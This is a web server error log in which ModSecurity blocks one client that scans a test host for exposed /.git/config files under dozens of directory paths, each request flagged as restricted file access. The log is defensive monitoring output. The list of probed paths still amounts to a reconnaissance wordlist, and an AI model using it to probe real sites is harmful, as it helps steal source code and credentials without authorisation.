[Wed May 29 05:15:28.875928 2024] [:error] [pid 3549404] [client 91.215.85.43:40528] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77gAAAAY"]
[Wed May 29 05:15:28.876287 2024] [:error] [pid 3549404] [client 91.215.85.43:40528] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77gAAAAY"]
[Wed May 29 05:15:28.877997 2024] [:error] [pid 3548011] [client 91.215.85.43:40634] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/build/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_6wAAAAM"]
[Wed May 29 05:15:28.940672 2024] [:error] [pid 3548010] [client 91.215.85.43:40622] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcSAAAAAI"]
[Wed May 29 05:15:28.941245 2024] [:error] [pid 3548010] [client 91.215.85.43:40622] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcSAAAAAI"]
[Wed May 29 05:15:28.942513 2024] [:error] [pid 3548009] [client 91.215.85.43:40670] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /application/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KyQAAAAE"]
[Wed May 29 05:15:28.943061 2024] [:error] [pid 3548009] [client 91.215.85.43:40670] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KyQAAAAE"]
[Wed May 29 05:15:28.943457 2024] [:error] [pid 3548009] [client 91.215.85.43:40670] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.git/config"] [unique_id "Zlad0DUhJF2MEn3X500KyQAAAAE"]
[Wed May 29 05:15:28.944635 2024] [:error] [pid 3548010] [client 91.215.85.43:40622] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zlad0Jo1Ctr6j2zupIZcSAAAAAI"]
[Wed May 29 05:15:28.944676 2024] [:error] [pid 3548012] [client 91.215.85.43:40648] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /backup/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPwAAAAQ"]
[Wed May 29 05:15:28.945224 2024] [:error] [pid 3548012] [client 91.215.85.43:40648] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPwAAAAQ"]
[Wed May 29 05:15:28.945458 2024] [:error] [pid 3548012] [client 91.215.85.43:40648] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup/.git/config"] [unique_id "Zlad0HVn6hFxwDs0XlWQPwAAAAQ"]
[Wed May 29 05:15:28.956982 2024] [:error] [pid 3548013] [client 91.215.85.43:40554] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v1/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpnwAAAAU"]
[Wed May 29 05:15:28.957520 2024] [:error] [pid 3548013] [client 91.215.85.43:40554] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v1/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpnwAAAAU"]
[Wed May 29 05:15:28.957909 2024] [:error] [pid 3548013] [client 91.215.85.43:40554] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v1/.git/config"] [unique_id "Zlad0Py2I6587Lelj0kpnwAAAAU"]
[Wed May 29 05:15:28.958099 2024] [:error] [pid 3548008] [client 91.215.85.43:40540] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /m/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/m/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VwAAAAA"]
[Wed May 29 05:15:28.958515 2024] [:error] [pid 3548008] [client 91.215.85.43:40540] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/m/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VwAAAAA"]
[Wed May 29 05:15:28.958852 2024] [:error] [pid 3548008] [client 91.215.85.43:40540] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/m/.git/config"] [unique_id "Zlad0DVffgeDK1niMsA3VwAAAAA"]
[Wed May 29 05:15:28.965442 2024] [:error] [pid 3549624] [client 91.215.85.43:40590] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /database/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbwAAAAc"]
[Wed May 29 05:15:28.965763 2024] [:error] [pid 3549624] [client 91.215.85.43:40590] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbwAAAAc"]
[Wed May 29 05:15:28.966008 2024] [:error] [pid 3549624] [client 91.215.85.43:40590] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "Zlad0OHPBWXp6Kzvr44XbwAAAAc"]
[Wed May 29 05:15:28.973511 2024] [:error] [pid 3548011] [client 91.215.85.43:40606] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /config/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_7AAAAAM"]
[Wed May 29 05:15:28.973826 2024] [:error] [pid 3548011] [client 91.215.85.43:40606] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_7AAAAAM"]
[Wed May 29 05:15:28.974077 2024] [:error] [pid 3548011] [client 91.215.85.43:40606] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.git/config"] [unique_id "Zlad0J263y1OHB1HvF3_7AAAAAM"]
[Wed May 29 05:15:28.980103 2024] [:error] [pid 3549404] [client 91.215.85.43:40644] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v2/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77wAAAAY"]
[Wed May 29 05:15:28.980806 2024] [:error] [pid 3549404] [client 91.215.85.43:40644] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v2/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77wAAAAY"]
[Wed May 29 05:15:28.981214 2024] [:error] [pid 3549404] [client 91.215.85.43:40644] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v2/.git/config"] [unique_id "Zlad0C1nmPbRu49M09_77wAAAAY"]
[Wed May 29 05:15:29.043036 2024] [:error] [pid 3548009] [client 91.215.85.43:40680] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /a/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/a/.git/config"] [unique_id "Zlad0TUhJF2MEn3X500KygAAAAE"]
[Wed May 29 05:15:29.043631 2024] [:error] [pid 3548009] [client 91.215.85.43:40680] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/a/.git/config"] [unique_id "Zlad0TUhJF2MEn3X500KygAAAAE"]
[Wed May 29 05:15:29.043929 2024] [authz_core:error] [pid 3548010] [client 91.215.85.43:40650] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.git
[Wed May 29 05:15:29.044055 2024] [:error] [pid 3548009] [client 91.215.85.43:40680] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/a/.git/config"] [unique_id "Zlad0TUhJF2MEn3X500KygAAAAE"]
[Wed May 29 05:15:29.441783 2024] [:error] [pid 3549624] [client 91.215.85.43:40702] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v3/.git/config"] [unique_id "Zlad0eHPBWXp6Kzvr44XcAAAAAc"]
[Wed May 29 05:15:29.442134 2024] [:error] [pid 3548008] [client 91.215.85.43:40692] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repository/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repository/.git/config"] [unique_id "Zlad0TVffgeDK1niMsA3WAAAAAA"]
[Wed May 29 05:15:29.442383 2024] [:error] [pid 3549624] [client 91.215.85.43:40702] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v3/.git/config"] [unique_id "Zlad0eHPBWXp6Kzvr44XcAAAAAc"]
[Wed May 29 05:15:29.442485 2024] [:error] [pid 3548008] [client 91.215.85.43:40692] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repository/.git/config"] [unique_id "Zlad0TVffgeDK1niMsA3WAAAAAA"]
[Wed May 29 05:15:29.442770 2024] [:error] [pid 3548008] [client 91.215.85.43:40692] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repository/.git/config"] [unique_id "Zlad0TVffgeDK1niMsA3WAAAAAA"]
[Wed May 29 05:15:29.442826 2024] [:error] [pid 3549624] [client 91.215.85.43:40702] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/v3/.git/config"] [unique_id "Zlad0eHPBWXp6Kzvr44XcAAAAAc"]
[Wed May 29 05:15:29.443947 2024] [:error] [pid 3548011] [client 91.215.85.43:40936] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_7QAAAAM"]
[Wed May 29 05:15:29.444222 2024] [:error] [pid 3548011] [client 91.215.85.43:40936] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_7QAAAAM"]
[Wed May 29 05:15:29.444488 2024] [:error] [pid 3548011] [client 91.215.85.43:40936] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zlad0Z263y1OHB1HvF3_7QAAAAM"]
[Wed May 29 05:15:29.445575 2024] [:error] [pid 3549404] [client 91.215.85.43:40802] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repos/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repos/.git/config"] [unique_id "Zlad0S1nmPbRu49M09_78AAAAAY"]
